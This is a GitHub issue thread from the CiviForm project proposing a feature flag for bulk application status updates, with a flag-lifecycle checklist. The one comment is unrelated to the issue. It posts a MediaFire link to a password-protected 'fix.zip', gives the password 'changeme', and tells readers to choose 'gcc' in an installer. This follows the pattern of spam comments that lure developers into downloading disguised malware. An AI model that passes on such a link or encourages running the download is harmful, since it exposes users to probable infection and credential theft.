### ISSUE TITLE
Create Feature flag for Bulk status update

### ISSUE THREAD

**Issue by swatkat1** [civiform/civiform#8425]
### Flag name

BULK_STATUS_UPDATE_ENABLED

### Feature description

When enabled, admins will be able to select many applications for status. 

### Checklist

Follow detailed instructions in [Feature Flags wiki page](https://github.com/civiform/civiform/wiki/Feature-Flags), and keep the [feature flag tracking spreadsheet](https://docs.google.com/spreadsheets/d/149xPiY0WMLAE5be51pvznyytfGVRTzu4QqrBs427DaA/edit#gid=0) updated as the flag lifecycle progresses.

- [x] Create feature flag
- [ ] Implement code guarded with flag, including unit and browser tests that manipulate the state of the flag as needed
- [ ] Enable flag [in dev](https://github.com/civiform/civiform/blob/main/server/conf/application.dev.conf)
- [ ] Enable flag [in staging](https://github.com/civiform/civiform-staging-deploy/blob/main/aws_staging_civiform_config.sh)
- [ ] Coordinate with @shreyachatterjee00 to announce the feature to CEs
- [ ] Deprecate flag (default to true unless overridden in config)
- [ ] Remove flag completely

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
